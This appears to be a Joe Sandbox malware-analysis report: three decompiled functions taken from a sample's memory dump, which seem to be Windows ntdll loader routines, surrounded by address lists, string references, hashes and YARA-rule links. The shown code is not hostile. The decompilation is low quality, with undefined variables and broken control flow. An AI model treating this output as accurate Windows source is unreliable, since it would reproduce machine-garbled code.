                                                                                                                                                                                            0x33d4e593
                                                                                                                                                                                            0x33d4e593
                                                                                                                                                                                            0x33d4e59f
                                                                                                                                                                                            0x33d4e5a2
                                                                                                                                                                                            0x33d4e5a8
                                                                                                                                                                                            0x33d4e5ae
                                                                                                                                                                                            0x33d4e5ae
                                                                                                                                                                                            0x33d4e5b3
                                                                                                                                                                                            0x33d4e5b3
                                                                                                                                                                                            0x33cef94d
                                                                                                                                                                                            0x33cefa0c
                                                                                                                                                                                            0x33cef953
                                                                                                                                                                                            0x33cef953
                                                                                                                                                                                            0x33cef953
                                                                                                                                                                                            0x33cef957
                                                                                                                                                                                            0x33cefa17
                                                                                                                                                                                            0x33cefa1b
                                                                                                                                                                                            0x33cefa28
                                                                                                                                                                                            0x33cefa2d
                                                                                                                                                                                            0x33cefa2d
                                                                                                                                                                                            0x33cef95d
                                                                                                                                                                                            0x33cef965
                                                                                                                                                                                            0x33d4e5c7
                                                                                                                                                                                            0x33d4e5cc
                                                                                                                                                                                            0x33d4e5ce
                                                                                                                                                                                            0x33d4e5d3
                                                                                                                                                                                            0x33d4e5d3
                                                                                                                                                                                            0x33cef96f
                                                                                                                                                                                            0x33cef981
                                                                                                                                                                                            0x33cef981
                                                                                                                                                                                            0x00000000
                                                                                                                                                                                            0x33cef987
                                                                                                                                                                                            0x33cef98d
                                                                                                                                                                                            0x33cef992
                                                                                                                                                                                            0x33cef999
                                                                                                                                                                                            0x00000000
                                                                                                                                                                                            0x33cef99b
                                                                                                                                                                                            0x33cef99b
                                                                                                                                                                                            0x33cef9a0
                                                                                                                                                                                            0x33cef9ac
                                                                                                                                                                                            0x33d4e5e3
                                                                                                                                                                                            0x33cef9b2
                                                                                                                                                                                            0x33cef9b2
                                                                                                                                                                                            0x33cef9b2
                                                                                                                                                                                            0x33cef9b7
                                                                                                                                                                                            0x33d4e5ea
                                                                                                                                                                                            0x33d4e5f0
                                                                                                                                                                                            0x33d4e5f7
                                                                                                                                                                                            0x33d4e5fd
                                                                                                                                                                                            0x33d4e602
                                                                                                                                                                                            0x33d4e604
                                                                                                                                                                                            0x33d4e60f
                                                                                                                                                                                            0x33d4e60f
                                                                                                                                                                                            0x33d4e60f
                                                                                                                                                                                            0x33d4e618
                                                                                                                                                                                            0x33d4e621
                                                                                                                                                                                            0x33d4e622
                                                                                                                                                                                            0x33d4e624
                                                                                                                                                                                            0x33d4e62c
                                                                                                                                                                                            0x33d4e62d
                                                                                                                                                                                            0x33d4e631
                                                                                                                                                                                            0x33d4e631
                                                                                                                                                                                            0x33d4e5f7
                                                                                                                                                                                            0x33cef9bd
                                                                                                                                                                                            0x33cef9c2
                                                                                                                                                                                            0x33cef9ce
                                                                                                                                                                                            0x33d4e644
                                                                                                                                                                                            0x33cef9d4
                                                                                                                                                                                            0x33cef9d4
                                                                                                                                                                                            0x33cef9d4
                                                                                                                                                                                            0x33cef9d9
                                                                                                                                                                                            0x33d4e64b
                                                                                                                                                                                            0x33d4e650
                                                                                                                                                                                            0x33d4e652
                                                                                                                                                                                            0x33d4e65d
                                                                                                                                                                                            0x33d4e65d
                                                                                                                                                                                            0x33d4e65d
                                                                                                                                                                                            0x33d4e666
                                                                                                                                                                                            0x33d4e66f
                                                                                                                                                                                            0x33d4e670
                                                                                                                                                                                            0x33d4e672
                                                                                                                                                                                            0x33d4e67a
                                                                                                                                                                                            0x33d4e67b
                                                                                                                                                                                            0x33d4e67f
                                                                                                                                                                                            0x33d4e67f
                                                                                                                                                                                            0x33cef9e6
                                                                                                                                                                                            0x33d4e692
                                                                                                                                                                                            0x33cef9ec
                                                                                                                                                                                            0x33cef9ec
                                                                                                                                                                                            0x33cef9ec
                                                                                                                                                                                            0x33cef9f4
                                                                                                                                                                                            0x33cefa3d
                                                                                                                                                                                            0x33cefa3d
                                                                                                                                                                                            0x00000000
                                                                                                                                                                                            0x33cef9f4
                                                                                                                                                                                            0x33cef999
                                                                                                                                                                                            0x33cef918

                                                                                                                                                                                            APIs
                                                                                                                                                                                            Strings
                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                            • Source File: 00000002.00000002.3795336805.0000000033CC0000.00000040.00001000.00020000.00000000.sdmp, Offset: 33CC0000, based on PE: true
                                                                                                                                                                                            • Associated: 00000002.00000002.3795336805.0000000033DE9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000002.00000002.3795336805.0000000033DED000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_33cc0000_fjerbregners_patrol.jbxd
                                                                                                                                                                                            Similarity
                                                                                                                                                                                            • API ID: DebugPrintTimes
                                                                                                                                                                                            • String ID: (HeapHandle != NULL)$HEAP: $HEAP[%wZ]:
                                                                                                                                                                                            • API String ID: 3446177414-3610490719
                                                                                                                                                                                            • Opcode ID: 53fb42807981ba68f711394c8208c03107dcc4ff48055d86e9751abe208ce83c
                                                                                                                                                                                            • Instruction ID: 2ad6a54a6b844065d6303930fef6b275d890e82d19970b2f1ed27188073695fe
                                                                                                                                                                                            • Opcode Fuzzy Hash: 53fb42807981ba68f711394c8208c03107dcc4ff48055d86e9751abe208ce83c
                                                                                                                                                                                            • Instruction Fuzzy Hash: FD912872B05741AFE315DF25C840B2EB7A9FF44B81F060659E984DBA91DF34E841CBA2
                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                            Function 33D2C640 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 141timeCOMMON
                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                            C-Code - Quality: 54%
                                                                                                                                                                                            			E33D2C640(void* __ebx, signed int __ecx, void* __edx, void* __edi) {
				signed int _v20;
				signed int _v36;
				char _v544;
				char _v552;
				char _v556;
				char* _v560;
				short _v562;
				signed int _v564;
				short _v570;
				char _v572;
				signed int _v580;
				char _v588;
				signed int _v604;
				signed short _v608;
				void* __esi;
				void* __ebp;
				void* _t25;
				signed int* _t27;
				signed int _t39;
				signed int _t42;
				signed int _t54;
				signed char _t56;
				signed int* _t58;
				intOrPtr* _t65;
				signed int _t67;
				void* _t70;
				signed int _t72;
				signed int _t75;
				void* _t77;
				signed int _t80;
				void* _t82;
				signed int _t85;
				signed int _t87;

				_t70 = __edx;
				_push(__ebx);
				_push(__edi);
				_t72 = __ecx;
				_t25 = E33D10130();
				if(_t25 != 0) {
					L33D02330(_t25, 0x33de5b5c);
					_t27 =  *0x33de9224; // 0x0
					_t75 =  *_t27;
					__eflags = _t72;
					if(_t72 != 0) {
						__eflags = _t75;
						if(_t75 == 0) {
							goto L13;
						} else {
							_t80 = _t75 - 1;
							goto L7;
						}
					} else {
						__eflags = _t75;
						if(_t75 == 0) {
							E33CE9050( *0x33de921c, _t75);
						}
						__eflags = _t75 - 0xffffffff;
						if(_t75 == 0xffffffff) {
							L13:
							L33D024D0(0x33de5b5c);
							_t65 = 0xe;
							asm("int 0x29");
							_t87 = (_t85 & 0xfffffff8) - 0x224;
							_v20 =  *0x33deb370 ^ _t87;
							_t76 = _t65;
							 *0x33de91e0( &_v544, 0x104, _t75, _t82);
							_t67 =  *_t65() + _t33;
							__eflags = _t67;
							if(_t67 != 0) {
								__eflags =  *0x33de660c;
								_v560 =  &_v552;
								_v564 = _t67;
								_v562 = 0x208;
								if(__eflags == 0) {
									L25:
									_push( &_v556);
									_push( &_v564);
									L33D7CB20(0x33de5b5c, _t72, _t76, __eflags);
									goto L15;
								} else {
									_t76 = ( *0x33de6608 & 0x0000ffff) + 2 + _t67;
									_t42 = E33D05D90(_t67,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t76);
									_v580 = _t42;
									__eflags = _t42;
									if(_t42 != 0) {
										__eflags = 0;
										_v570 = _t76;
										_v572 = 0;
										E33D110D0(_t67,  &_v572, 0x33de6608);
										E33D110D0(_t67,  &_v580,  &_v572);
										E33CFFE40(_t67,  &_v588, ";");
										E33D03BC0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0,  *0x33de660c);
										 *0x33de6608 = _v608;
										_t54 = _v604;
										 *0x33de660c = _t54;
										 *0x33de6604 = _t54;
										E33D7D4A0(_t67, __eflags);
										goto L25;
									} else {
										_t56 =  *0x33de37c0; // 0x0
										__eflags = _t56 & 0x00000003;
										if((_t56 & 0x00000003) != 0) {
											_push("Failed to reallocate the system dirs string !\n");
											_push(0);
											_push("LdrpInitializePerUserWindowsDirectory");
											_push(0xcf4);
											_push("minkernel\\ntdll\\ldrinit.c");
											E33D6E692();
											_t56 =  *0x33de37c0; // 0x0
											_t87 = _t87 + 0x14;
										}
										__eflags = _t56 & 0x00000010;
										if((_t56 & 0x00000010) != 0) {
											asm("int3");
										}
										_t39 = 0xc0000017;
									}
								}
							} else {
								L15:
								_t39 = 0;
								__eflags = 0;
							}
							_pop(_t77);
							__eflags = _v36 ^ _t87;
							return L33D34B50(_t39, 0x33de5b5c, _v36 ^ _t87, _t70, _t72, _t77);
						} else {
							_t80 = _t75 + 1;
							__eflags = _t80;
							L7:
							_t58 =  *0x33de9224; // 0x0
							 *_t58 = _t80;
							__eflags = _t72;
							if(_t72 != 0) {
								__eflags = _t80;
								if(_t80 == 0) {
									E33CE9050( *0x33de921c, "true");
								}
							}
							_t25 = L33D024D0(0x33de5b5c);
							goto L1;
						}
					}
				} else {
					L1:
					return _t25;
				}
			}




































                                                                                                                                                                                            0x33d2c640
                                                                                                                                                                                            0x33d2c642
                                                                                                                                                                                            0x33d2c644
                                                                                                                                                                                            0x33d2c645
                                                                                                                                                                                            0x33d2c647
                                                                                                                                                                                            0x33d2c64e
                                                                                                                                                                                            0x33d2c65a
                                                                                                                                                                                            0x33d2c65f
                                                                                                                                                                                            0x33d2c664
                                                                                                                                                                                            0x33d2c666
                                                                                                                                                                                            0x33d2c668
                                                                                                                                                                                            0x33d2c6a4
                                                                                                                                                                                            0x33d2c6a6
                                                                                                                                                                                            0x00000000
                                                                                                                                                                                            0x33d2c6a8
                                                                                                                                                                                            0x33d2c6a8
                                                                                                                                                                                            0x00000000
                                                                                                                                                                                            0x33d2c6a8
                                                                                                                                                                                            0x33d2c66a
                                                                                                                                                                                            0x33d2c66a
                                                                                                                                                                                            0x33d2c66c
                                                                                                                                                                                            0x33d2c675
                                                                                                                                                                                            0x33d2c675
                                                                                                                                                                                            0x33d2c67a
                                                                                                                                                                                            0x33d2c67d
                                                                                                                                                                                            0x33d2c6ab
                                                                                                                                                                                            0x33d2c6ac
                                                                                                                                                                                            0x33d2c6b3
                                                                                                                                                                                            0x33d2c6b4
                                                                                                                                                                                            0x33d2c6be
                                                                                                                                                                                            0x33d2c6cb
                                                                                                                                                                                            0x33d2c6dc
                                                                                                                                                                                            0x33d2c6df
                                                                                                                                                                                            0x33d2c6e9
                                                                                                                                                                                            0x33d2c6e9
                                                                                                                                                                                            0x33d2c6eb
                                                                                                                                                                                            0x33d68090
                                                                                                                                                                                            0x33d6809b
                                                                                                                                                                                            0x33d680a4
                                                                                                                                                                                            0x33d680a9
                                                                                                                                                                                            0x33d680ae
                                                                                                                                                                                            0x33d6817f
                                                                                                                                                                                            0x33d68183
                                                                                                                                                                                            0x33d68188
                                                                                                                                                                                            0x33d68189
                                                                                                                                                                                            0x00000000
                                                                                                                                                                                            0x33d680b4
                                                                                                                                                                                            0x33d680c4
                                                                                                                                                                                            0x33d680cc
                                                                                                                                                                                            0x33d680d1
                                                                                                                                                                                            0x33d680d5
                                                                                                                                                                                            0x33d680d7
                                                                                                                                                                                            0x33d68114
                                                                                                                                                                                            0x33d68116
                                                                                                                                                                                            0x33d6811b
                                                                                                                                                                                            0x33d6812a
                                                                                                                                                                                            0x33d68139
                                                                                                                                                                                            0x33d68148
                                                                                                                                                                                            0x33d6815e
                                                                                                                                                                                            0x33d68167
                                                                                                                                                                                            0x33d6816c
                                                                                                                                                                                            0x33d68170
                                                                                                                                                                                            0x33d68175
                                                                                                                                                                                            0x33d6817a
                                                                                                                                                                                            0x00000000
                                                                                                                                                                                            0x33d680d9
                                                                                                                                                                                            0x33d680d9
                                                                                                                                                                                            0x33d680de
                                                                                                                                                                                            0x33d680e0
                                                                                                                                                                                            0x33d680e2
                                                                                                                                                                                            0x33d680e7
                                                                                                                                                                                            0x33d680e9
                                                                                                                                                                                            0x33d680ee
                                                                                                                                                                                            0x33d680f3
                                                                                                                                                                                            0x33d680f8
                                                                                                                                                                                            0x33d680fd
                                                                                                                                                                                            0x33d68102
                                                                                                                                                                                            0x33d68102
                                                                                                                                                                                            0x33d68105
                                                                                                                                                                                            0x33d68107
                                                                                                                                                                                            0x33d68109
                                                                                                                                                                                            0x33d68109
                                                                                                                                                                                            0x33d6810a
                                                                                                                                                                                            0x33d6810a
                                                                                                                                                                                            0x33d680d7
                                                                                                                                                                                            0x33d2c6f1
                                                                                                                                                                                            0x33d2c6f1
                                                                                                                                                                                            0x33d2c6f1
                                                                                                                                                                                            0x33d2c6f1
                                                                                                                                                                                            0x33d2c6f1
                                                                                                                                                                                            0x33d2c6fa
                                                                                                                                                                                            0x33d2c6fb
                                                                                                                                                                                            0x33d2c705
                                                                                                                                                                                            0x33d2c67f
                                                                                                                                                                                            0x33d2c67f
                                                                                                                                                                                            0x33d2c67f
                                                                                                                                                                                            0x33d2c680
                                                                                                                                                                                            0x33d2c680
                                                                                                                                                                                            0x33d2c685
                                                                                                                                                                                            0x33d2c687
                                                                                                                                                                                            0x33d2c689
                                                                                                                                                                                            0x33d2c68b
                                                                                                                                                                                            0x33d2c68d
                                                                                                                                                                                            0x33d2c697
                                                                                                                                                                                            0x33d2c697
                                                                                                                                                                                            0x33d2c68d
                                                                                                                                                                                            0x33d2c69d
                                                                                                                                                                                            0x00000000
                                                                                                                                                                                            0x33d2c69d
                                                                                                                                                                                            0x33d2c67d
                                                                                                                                                                                            0x33d2c650
                                                                                                                                                                                            0x33d2c650
                                                                                                                                                                                            0x33d2c653
                                                                                                                                                                                            0x33d2c653

                                                                                                                                                                                            APIs
                                                                                                                                                                                            Strings
                                                                                                                                                                                            • LdrpInitializePerUserWindowsDirectory, xrefs: 33D680E9
                                                                                                                                                                                            • minkernel\ntdll\ldrinit.c, xrefs: 33D680F3
                                                                                                                                                                                            • Failed to reallocate the system dirs string !, xrefs: 33D680E2
                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                            • Source File: 00000002.00000002.3795336805.0000000033CC0000.00000040.00001000.00020000.00000000.sdmp, Offset: 33CC0000, based on PE: true
                                                                                                                                                                                            • Associated: 00000002.00000002.3795336805.0000000033DE9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000002.00000002.3795336805.0000000033DED000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_33cc0000_fjerbregners_patrol.jbxd
                                                                                                                                                                                            Similarity
                                                                                                                                                                                            • API ID: DebugPrintTimes
                                                                                                                                                                                            • String ID: Failed to reallocate the system dirs string !$LdrpInitializePerUserWindowsDirectory$minkernel\ntdll\ldrinit.c
                                                                                                                                                                                            • API String ID: 3446177414-1783798831
                                                                                                                                                                                            • Opcode ID: 4ecb8ba280f7ecb7fcf7d5e48dcb397b8784ab6b4526f7b032b301648f3765d9
                                                                                                                                                                                            • Instruction ID: 6c6b0d4545746f48a27a9e5d022abe03ad00bcb48c19021a63f87275f673f735
                                                                                                                                                                                            • Opcode Fuzzy Hash: 4ecb8ba280f7ecb7fcf7d5e48dcb397b8784ab6b4526f7b032b301648f3765d9
                                                                                                                                                                                            • Instruction Fuzzy Hash: 114112B6925300AFD720EB24CC00B4B7BE8EF44B55F40096AF898E3660EB74D801CBA1
                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                            Function 33D743D5 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 121timeCOMMON
                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                            C-Code - Quality: 50%
                                                                                                                                                                                            			E33D743D5(intOrPtr __ecx, void* __edx, intOrPtr _a4) {
				intOrPtr _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				intOrPtr _v20;
				char _v24;
				intOrPtr _v28;
				void* __ebx;
				void* __esi;
				signed char _t37;
				signed int _t41;
				intOrPtr _t44;
				signed int _t49;
				signed int _t50;
				signed int _t51;
				signed int _t52;
				void* _t54;
				signed int _t59;
				signed int _t60;
				signed int _t64;
				signed int _t66;
				intOrPtr _t68;
				signed int _t69;
				intOrPtr _t70;

				_t68 = _a4;
				_t54 = __edx;
				_v28 = __ecx;
				_v24 = L33D74B46(_t68);
				_v12 =  *((intOrPtr*)(_t54 + 0x2c));
				_v8 =  *((intOrPtr*)(_t54 + 0x30));
				_v20 =  *((intOrPtr*)(_t54 + 0x90));
				_t37 =  *0x33de6714; // 0x0
				_v16 = _t68;
				_t69 =  *0x33de6710; // 0x0
				if((_t37 & 0x00000001) != 0) {
					if(_t69 == 0) {
						_t69 = 0;
						__eflags = 0;
					} else {
						_t69 = _t69 ^ 0x33de6710;
					}
				}
				_t64 = _t37 & 1;
				while(_t69 != 0) {
					__eflags = L33D74528(_t54, _t69,  &_v24, _t69);
					if(__eflags >= 0) {
						if(__eflags <= 0) {
							L25:
							while(_t69 != 0) {
								_t41 = L33D74528(_t54, _t69,  &_v24, _t69);
								__eflags = _t41;
								if(_t41 != 0) {
									break;
								}
								_t66 =  *0x33de5ca0; // 0x0
								__eflags = _t66;
								if(_t66 == 0) {
									L28:
									__eflags =  *0x33de37c0 & 0x00000005;
									_t70 =  *((intOrPtr*)(_t69 + 0x20));
									if(( *0x33de37c0 & 0x00000005) != 0) {
										_t44 =  *((intOrPtr*)( *[fs:0x30] + 0x10));
										_push( *((intOrPtr*)(_t44 + 0x2a8)));
										_push( *((intOrPtr*)(_t44 + 0x2a4)));
										_push(_a4);
										_push( *((intOrPtr*)(_t54 + 0x30)));
										_push( *((intOrPtr*)(_t54 + 0x2c)));
										_push( *((intOrPtr*)(_v28 + 0x30)));
										E33D6E692("minkernel\\ntdll\\ldrredirect.c", 0x12b, "LdrpCheckRedirection", 2, "Import Redirection: %wZ %wZ!%s redirected to %wZ\n",  *((intOrPtr*)(_v28 + 0x2c)));
									}
									L27:
									return _t70;
								}
								 *0x33de91e0( *((intOrPtr*)(_v28 + 0x28)),  *((intOrPtr*)(_t69 + 0x24)));
								_t49 =  *_t66();
								__eflags = _t49;
								if(_t49 != 0) {
									goto L28;
								}
								_t50 =  *(_t69 + 4);
								_t59 = _t69;
								__eflags = _t50;
								if(_t50 == 0) {
									while(1) {
										_t69 =  *(_t69 + 8) & 0xfffffffc;
										__eflags = _t69;
										if(_t69 == 0) {
											goto L25;
										}
										__eflags =  *_t69 - _t59;
										if( *_t69 == _t59) {
											goto L25;
										}
										_t59 = _t69;
									}
									continue;
								}
								_t69 = _t50;
								_t60 =  *_t69;
								__eflags = _t60;
								if(_t60 == 0) {
									continue;
								} else {
									goto L20;
								}
								do {
									L20:
									_t51 =  *_t60;
									_t69 = _t60;
									_t60 = _t51;
									__eflags = _t51;
								} while (_t51 != 0);
							}
							_t70 = 0xffbadd11;
							goto L27;
						}
						_t52 =  *(_t69 + 4);
						L9:
						__eflags = _t64;
						if(_t64 == 0) {
							L12:
							_t69 = _t52;
							continue;
						}
						__eflags = _t52;
						if(_t52 == 0) {
							goto L12;
						}
						_t69 = _t69 ^ _t52;
						continue;
					}
					_t52 =  *_t69;
					goto L9;
				}
				goto L25;
			}


























                                                                                                                                                                                            0x33d743e2
                                                                                                                                                                                            0x33d743e5
                                                                                                                                                                                            0x33d743e7
                                                                                                                                                                                            0x33d743f3
                                                                                                                                                                                            0x33d743fa
                                                                                                                                                                                            0x33d74401
                                                                                                                                                                                            0x33d7440b
                                                                                                                                                                                            0x33d7440f
                                                                                                                                                                                            0x33d74414
                                                                                                                                                                                            0x33d74418
                                                                                                                                                                                            0x33d74420
                                                                                                                                                                                            0x33d74424
                                                                                                                                                                                            0x33d7442e
                                                                                                                                                                                            0x33d7442e
                                                                                                                                                                                            0x33d74426
                                                                                                                                                                                            0x33d74426
                                                                                                                                                                                            0x33d74426
                                                                                                                                                                                            0x33d74424
                                                                                                                                                                                            0x33d74433
                                                                                                                                                                                            0x33d7445e
                                                                                                                                                                                            0x33d74443
                                                                                                                                                                                            0x33d74445
                                                                                                                                                                                            0x33d7444b
                                                                                                                                                                                            0x00000000
                                                                                                                                                                                            0x33d744c0
                                                                                                                                                                                            0x33d7446a
                                                                                                                                                                                            0x33d7446f
                                                                                                                                                                                            0x33d74471
                                                                                                                                                                                            0x00000000
                                                                                                                                                                                            0x00000000
                                                                                                                                                                                            0x33d74473
                                                                                                                                                                                            0x33d74479
                                                                                                                                                                                            0x33d7447b
                                                                                                                                                                                            0x33d744d4
                                                                                                                                                                                            0x33d744d4
                                                                                                                                                                                            0x33d744db
                                                                                                                                                                                            0x33d744de
                                                                                                                                                                                            0x33d744e6
                                                                                                                                                                                            0x33d744e9
                                                                                                                                                                                            0x33d744ef
                                                                                                                                                                                            0x33d744f9
                                                                                                                                                                                            0x33d744fc
                                                                                                                                                                                            0x33d744ff
                                                                                                                                                                                            0x33d74502
                                                                                                                                                                                            0x33d7451e
                                                                                                                                                                                            0x33d74523
                                                                                                                                                                                            0x33d744c9
                                                                                                                                                                                            0x33d744d1
                                                                                                                                                                                            0x33d744d1
                                                                                                                                                                                            0x33d74489
                                                                                                                                                                                            0x33d7448f
                                                                                                                                                                                            0x33d74491
                                                                                                                                                                                            0x33d74493
                                                                                                                                                                                            0x00000000
                                                                                                                                                                                            0x00000000
                                                                                                                                                                                            0x33d74495
                                                                                                                                                                                            0x33d74498
                                                                                                                                                                                            0x33d7449a
                                                                                                                                                                                            0x33d7449c
                                                                                                                                                                                            0x33d744b8
                                                                                                                                                                                            0x33d744bb
                                                                                                                                                                                            0x33d744bb
                                                                                                                                                                                            0x33d744be
                                                                                                                                                                                            0x00000000
                                                                                                                                                                                            0x00000000
                                                                                                                                                                                            0x33d744b2
                                                                                                                                                                                            0x33d744b4
                                                                                                                                                                                            0x00000000
                                                                                                                                                                                            0x00000000
                                                                                                                                                                                            0x33d744b6
                                                                                                                                                                                            0x33d744b6
                                                                                                                                                                                            0x00000000
                                                                                                                                                                                            0x33d744b8
                                                                                                                                                                                            0x33d7449e
                                                                                                                                                                                            0x33d744a0
                                                                                                                                                                                            0x33d744a2
                                                                                                                                                                                            0x33d744a4
                                                                                                                                                                                            0x00000000
                                                                                                                                                                                            0x00000000
                                                                                                                                                                                            0x00000000
                                                                                                                                                                                            0x00000000
                                                                                                                                                                                            0x33d744a6
                                                                                                                                                                                            0x33d744a6
                                                                                                                                                                                            0x33d744a6
                                                                                                                                                                                            0x33d744a8
                                                                                                                                                                                            0x33d744aa
                                                                                                                                                                                            0x33d744ac
                                                                                                                                                                                            0x33d744ac
                                                                                                                                                                                            0x33d744b0
                                                                                                                                                                                            0x33d744c4
                                                                                                                                                                                            0x00000000
                                                                                                                                                                                            0x33d744c4
                                                                                                                                                                                            0x33d7444d
                                                                                                                                                                                            0x33d74450
                                                                                                                                                                                            0x33d74450
                                                                                                                                                                                            0x33d74452
                                                                                                                                                                                            0x33d7445c
                                                                                                                                                                                            0x33d7445c
                                                                                                                                                                                            0x00000000
                                                                                                                                                                                            0x33d7445c
                                                                                                                                                                                            0x33d74454
                                                                                                                                                                                            0x33d74456
                                                                                                                                                                                            0x00000000
                                                                                                                                                                                            0x00000000
                                                                                                                                                                                            0x33d74458
                                                                                                                                                                                            0x00000000
                                                                                                                                                                                            0x33d74458
                                                                                                                                                                                            0x33d74447
                                                                                                                                                                                            0x00000000
                                                                                                                                                                                            0x33d74447
                                                                                                                                                                                            0x00000000

                                                                                                                                                                                            APIs
                                                                                                                                                                                            Strings
                                                                                                                                                                                            • Import Redirection: %wZ %wZ!%s redirected to %wZ, xrefs: 33D74508
                                                                                                                                                                                            • minkernel\ntdll\ldrredirect.c, xrefs: 33D74519
                                                                                                                                                                                            • LdrpCheckRedirection, xrefs: 33D7450F
                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                            • Source File: 00000002.00000002.3795336805.0000000033CC0000.00000040.00001000.00020000.00000000.sdmp, Offset: 33CC0000, based on PE: true
                                                                                                                                                                                            • Associated: 00000002.00000002.3795336805.0000000033DE9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000002.00000002.3795336805.0000000033DED000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_33cc0000_fjerbregners_patrol.jbxd
                                                                                                                                                                                            Similarity
                                                                                                                                                                                            • API ID: DebugPrintTimes
                                                                                                                                                                                            • String ID: Import Redirection: %wZ %wZ!%s redirected to %wZ$LdrpCheckRedirection$minkernel\ntdll\ldrredirect.c
                                                                                                                                                                                            • API String ID: 3446177414-3154609507
                                                                                                                                                                                            • Opcode ID: 9dc2cc33e775f96b08143b43c5945c679ad50a95c8d4265fb48f1d12acffde28
                                                                                                                                                                                            • Instruction ID: 26c452f153260a8fe07c3ae5e8a671fe8e97d84a4042e5fa7f96e771870e9b8e
                                                                                                                                                                                            • Opcode Fuzzy Hash: 9dc2cc33e775f96b08143b43c5945c679ad50a95c8d4265fb48f1d12acffde28
                                                                                                                                                                                            • Instruction Fuzzy Hash: 5D4113766043119FCB12DF78C940A16B7F8AF48A98F09065AECD8E7311DB70DC80EB91
                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                            Function 33D75B90 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 80timeCOMMON
                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                            C-Code - Quality: 31%
                                                                                                                                                                                            			E33D75B90(intOrPtr __ecx, void* __edi, void* __eflags, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12) {
				intOrPtr _v0;
				char _v8;
				char _v12;
				char _v16;
				char _v20;
				void* _t21;
				intOrPtr _t36;
				void* _t38;
				void* _t40;

				_t36 = __ecx;
				_t21 = E33D0DDA0(0, 0, 0x33cc1b68,  &_v8);
				if(_t21 < 0) {
					return _t21;
				}
				_t43 = _v8;
				if(L33D0CF00(_t36, _t38, _v8, 0x33cc1b78, 0,  &_v12, 0, _v0) >= 0) {
					_t43 = _v8;
					if(L33D0CF00(_t36, _t38, _v8, 0x33cc1b70, 0,  &_v20, 0, _v0) >= 0) {
						_t43 = _v8;
						if(L33D0CF00(_t36, _t38, _v8, 0x33cc1b80, 0,  &_v16, 0, _v0) >= 0) {
							_t36 = _v12;
							 *0x33de91e0(0, L"Wow64 Emulation Layer", __edi);
							_t40 = _v12();
							if(_t40 != 0) {
								 *0x33de91e0(_t40, 4, 0, _a12, 0, _a4, 0, _a8, 0);
								_v16();
								_t36 = _v20;
								 *0x33de91e0(_t40);
								_v20();
							}
						}
					}
				}
				return L33D0CD80(_t36, _t43);
			}












                                                                                                                                                                                            0x33d75b90
                                                                                                                                                                                            0x33d75ba6
                                                                                                                                                                                            0x33d75bad
                                                                                                                                                                                            0x33d75c51
                                                                                                                                                                                            0x33d75c51
                                                                                                                                                                                            0x33d75bb7
                                                                                                                                                                                            0x33d75bcd
                                                                                                                                                                                            0x33d75bd2
                                                                                                                                                                                            0x33d75be8
                                                                                                                                                                                            0x33d75bed
                                                                                                                                                                                            0x33d75c03
                                                                                                                                                                                            0x33d75c05
                                                                                                                                                                                            0x33d75c0f
                                                                                                                                                                                            0x33d75c18
                                                                                                                                                                                            0x33d75c1c
                                                                                                                                                                                            0x33d75c31
                                                                                                                                                                                            0x33d75c37
                                                                                                                                                                                            0x33d75c3a
                                                                                                                                                                                            0x33d75c3e
                                                                                                                                                                                            0x33d75c44
                                                                                                                                                                                            0x33d75c44
                                                                                                                                                                                            0x33d75c47
                                                                                                                                                                                            0x33d75c03
                                                                                                                                                                                            0x33d75be8
                                                                                                                                                                                            0x00000000

                                                                                                                                                                                            APIs
                                                                                                                                                                                            Strings
                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                            • Source File: 00000002.00000002.3795336805.0000000033CC0000.00000040.00001000.00020000.00000000.sdmp, Offset: 33CC0000, based on PE: true
                                                                                                                                                                                            • Associated: 00000002.00000002.3795336805.0000000033DE9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000002.00000002.3795336805.0000000033DED000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_33cc0000_fjerbregners_patrol.jbxd
                                                                                                                                                                                            Similarity
                                                                                                                                                                                            • API ID: DebugPrintTimes
                                                                                                                                                                                            • String ID: Wow64 Emulation Layer
                                                                                                                                                                                            • API String ID: 3446177414-921169906
                                                                                                                                                                                            • Opcode ID: fc7332a19ea8a7f1287494bd3334c8a2afaffcb31370c01ea320d6fb0eb93315
                                                                                                                                                                                            • Instruction ID: 13ccd42ac58fb34db262dd05aa8cf53e7508cab253757a825097110937b4a45b
                                                                                                                                                                                            • Opcode Fuzzy Hash: fc7332a19ea8a7f1287494bd3334c8a2afaffcb31370c01ea320d6fb0eb93315
                                                                                                                                                                                            • Instruction Fuzzy Hash: 762106B690115DBFAB01AEA1CD84DFFBF7DEF44699B040054FA11A6100EA309E06DF71
                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                            Uniqueness Score: -1.00%

